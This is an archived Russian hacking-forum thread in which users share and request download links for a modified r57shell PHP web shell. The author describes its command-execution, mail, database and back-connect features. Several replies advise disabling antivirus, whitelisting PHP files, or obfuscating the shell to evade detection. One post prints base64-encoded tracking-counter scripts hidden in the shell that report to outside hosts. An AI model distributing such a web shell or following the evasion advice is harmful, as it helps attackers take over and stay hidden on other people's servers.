Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Переделанный шелл! (https://forum.antichat.xyz/showthread.php?t=13651)

k1b0rg 29.01.2006 15:45

Переделанный шелл!
 
Выкладываю свой шелл. Точнее мною переделанный шелл r57shell.
http://kobeluga.narod.ru/rst.txt
Что я добавил в шелл:
1)Конфиг(в левом верхнем углу):
т.е. Теперь все ненужные фичи шелла можно отключать(причом отключаеться не средствами JS, где просто скрываеться, а в самом php коде, т.е. лишний килобайты к вам не грузяться) =)))))
В конфиге есть еще текстовое поле CMD: это сделано для тех случаев, когда в папке где загружен шелл допустим 1000 файлов, а стандартная команда всех шеллов ls -lia. И они просто напросто повиснут в этом случае. Если такая ситуация у вас, просто жмем СТОП и прописываем нужную вам конмаду, и шелл запуститься с нею.
FTP: работа с ФТП
E-Mail: работа с email (отсылка писем и т.д.)
Mysql: работа с базами данных (Mysql,Mssql,Postgreql,Oracle)
PHP: выполнение php кодов
Text: поиск текста в файлах
Proxy: в публичной версии этого модуля нету
Seti: back конект и т.д.
Root: в публичной версии этого модуля нету
Единственное что при изменении конфига нажмите F5 если у вас кешируеться страницы.
2) создание файла/каталога с заданными правами
3) Изменение атрибутов файла/каталога (права, дата создания).
4) Показываеться твой IP и IP сервера, чтобы смотреть работает прокси или нет, или когда ставишь прокси не пинговать сервак чтобы узнать его Айпи.
5) Показываеться на сервере установленные утилиты из списка
wget,get,fetch,curl,lynx,links,tar,gcc,perl,php,ma ke
Планирую спрятать его от антивиря и чтобы его поисковики не определяли ,и убрать кеширование.
Вообщем тестируем, все глюки ,баги а также предложения и т.д. говорим мне, мне будет рассмотрено.

•••™NO FEAR™••• 29.01.2006 15:58

Ну ща посмотрим чё ты там добавил ))))

Barsik 29.01.2006 15:59

Амерский язык бы еще удалил. Он там не нужен

k1b0rg 29.01.2006 16:01

>>Амерский язык бы еще удалил. Он там не нужен
я тоже думал над этим, но вдруг где нить не будет русского языка, тогда что?

gazta 29.01.2006 23:15

А снизить вес как нибудь можно ? :)

Barsik 30.01.2006 00:21

Можно. Удали из него те вещи которые тебе не пригодятся, но думаю что большого эффекта ты не получишь

k1b0rg 30.01.2006 00:25

удали анлийскую текст, но мне вот он недавно пригодился.

A110ut 01.02.2006 06:13

k1b0rg просто нема слов :) r57 и так был офигенный, а стал еще офигенней. РЕСПЕКТ
ЗЫ: имхо буржуйский язык удалять не стоит... особенно тем кто оперу юзает)

ximik 02.02.2006 19:53

Можно ли его запаролить???

D1mOn 02.02.2006 20:00

как два пальца)))

F_taker 02.02.2006 21:47

Счас буду разбираться...

F_taker 02.02.2006 22:04

Чет у меня никак не получается его скопировать - народный хостинг тормозит :(
2автор: запакуй его в архив, выложи на сайте если не влом ;)

slime 10.02.2006 11:59

А вот у мя постоянно антивирус хрюкает когда видит этот шелл..... что можно сделать чтобы антивирус не распознавал шелл как вирус??

vectorg 10.02.2006 12:17

k1borg, респект за шелл!!! ;)
Цитата:

А вот у мя постоянно антивирус хрюкает когда видит этот шелл..... что можно сделать чтобы антивирус не распознавал шелл как вирус??
ОТКЛЮЧИТЬ АНТИВИРУС!!!

k1b0rg 10.02.2006 13:54

>>2автор: запакуй его в архив, выложи на сайте если не влом.

а может лучше не надо запаковывать и так выложить? =)))))
держи
http://kiborg.comp-info.ru/rst.txt

slime 10.02.2006 13:55

Цитата:

Сообщение от VectorG
ОТКЛЮЧИТЬ АНТИВИРУС!!!

я же не самоубийца..... может другие варианты есть

k1b0rg 10.02.2006 14:49

есть, в антивирусе указать чтобы он не реагировал на *.php файлы (ну если тока у антивиря есть такая фича), а вообще я подумываю как сделать его не палящимся

S-tamps 19.02.2006 23:42

Господа,

в связи с тем, что у киборга у самого не осталось копии этого чудесного переделанного шелла, не мог бы кто выложить здесь рабочий скрипт?

Desr0w 20.02.2006 00:08

4 0 4 ((

Inferno 20.02.2006 00:16

ТУТ
Пробуем

Desr0w 20.02.2006 00:25

Русифицарованая версия c99shell-не моя.
Кому надо http://desr0w.narod.ru/files/c99shell-ru.rar

k1b0rg 20.02.2006 00:29

inferno спасибо, тока не забудьте удалить строки
$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX 2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZ zPTgxNjA2
JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIi ZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9j dW1lbnQuY29va2l
lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iK yhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hv dGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKC k/IlkiOiJOIik8L
3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4 yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY 3JlZW4ud2lkdGgr
J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci 5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVl bi5jb2xvckRlcHR
oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgb GFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4 zIjwvc2NyaXB0Pj
xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19y Kz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YS BocmVmPSdodHRwO
i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9 wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5yd S9jZ2ktYmluL2hv
dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aW R0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxu b3NjcmlwdD48YSB
ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhc mdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5 ydS9jZ2ktYmluL2
hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lk dGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L2 5vc2NyaXB0Pg==";
$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsY W5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3J pdGUoJzxh
IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaW NrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6 Ly9jb3VudGVyLnl
hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVud C5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5 lZCcpPycnOg0KJz
tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyon KyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcH RoOnNjcmVlbi5wa
XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ 9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2 lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0Pjwh LS0vTGl2ZUludGV
ybmV0LS0+";

и строки
if(empty($c1)||empty($c2)) { die(); }
$f = '<br>';
$f .= base64_decode($c1);
$f .= base64_decode($c2);

это счетчики r57 я когда в первый раз выкладывал я просто сделал чтобы они не работали, а сам код забыл стереть

S-tamps 20.02.2006 00:31

Inferno - спаситель всея Руси ;) Респект отражен в репутации

Inferno 20.02.2006 00:36

Цитата:

Сообщение от S-tamps
Inferno - спаситель всея Руси ;) Респект отражен в репутации

Нема за шо +0 тоже хорошо)

S-tamps 20.02.2006 00:42

Хмм. Туплю. Просто первый раз человеку репутацию добавляю тут. ;) Кстати, где ставить +сколько так и не вижу ;(

Inferno 20.02.2006 01:04

Цитата:

Сообщение от S-tamps
Хмм. Туплю. Просто первый раз человеку репутацию добавляю тут. ;) Кстати, где ставить +сколько так и не вижу ;(

Обычные юзеры могут только +1 ставить когда больше 10 постов!

Жора 21.02.2006 16:45

да...чёт сцылки не работают
а вот очень захотелось такое себе :(
выложите кто-нибудь плз!

GreenBear 21.02.2006 17:17

http://k1on.nm.ru/conf.php

Google00 11.02.2007 17:54

Пацаны херня. Абсолютно все ссылки битые.
Если незатруднит ещё залейте.
Или если не в лом киньте на Kolian_hq@mail.ru

KSURi 11.02.2007 19:06

Цитата:

Сообщение от k1b0rg
есть, в антивирусе указать чтобы он не реагировал на *.php файлы (ну если тока у антивиря есть такая фича), а вообще я подумываю как сделать его не палящимся

А что думать-то? Механизм по которому авирь палит скрипты - убог как 2 копейки. Он просто анализирует строки и ищет паттерны из базы. Иногда помогает даже удаление комментариев, иногда переименование функций и тд, но самое надежное - обфускация

_Great_ 11.02.2007 19:16

Ксурь, посмотри на дату постов.

Deem3n® 11.02.2007 19:35

Цитата:

Или если не в лом киньте на Kolian_hq@mail.ru
Молодец! +1 мыло в базу спамерам.

Google00 15.02.2007 22:27

Цитата:

Сообщение от Deem3n®
Молодец! +1 мыло в базу спамерам.

По барабану. Коля это даже не моё имя :)

x-treem 03.04.2007 08:29

вот держи.
сам долго искал.
потом случайно нашёл
_http://xtreemx.info/iii.txt


Время: 07:31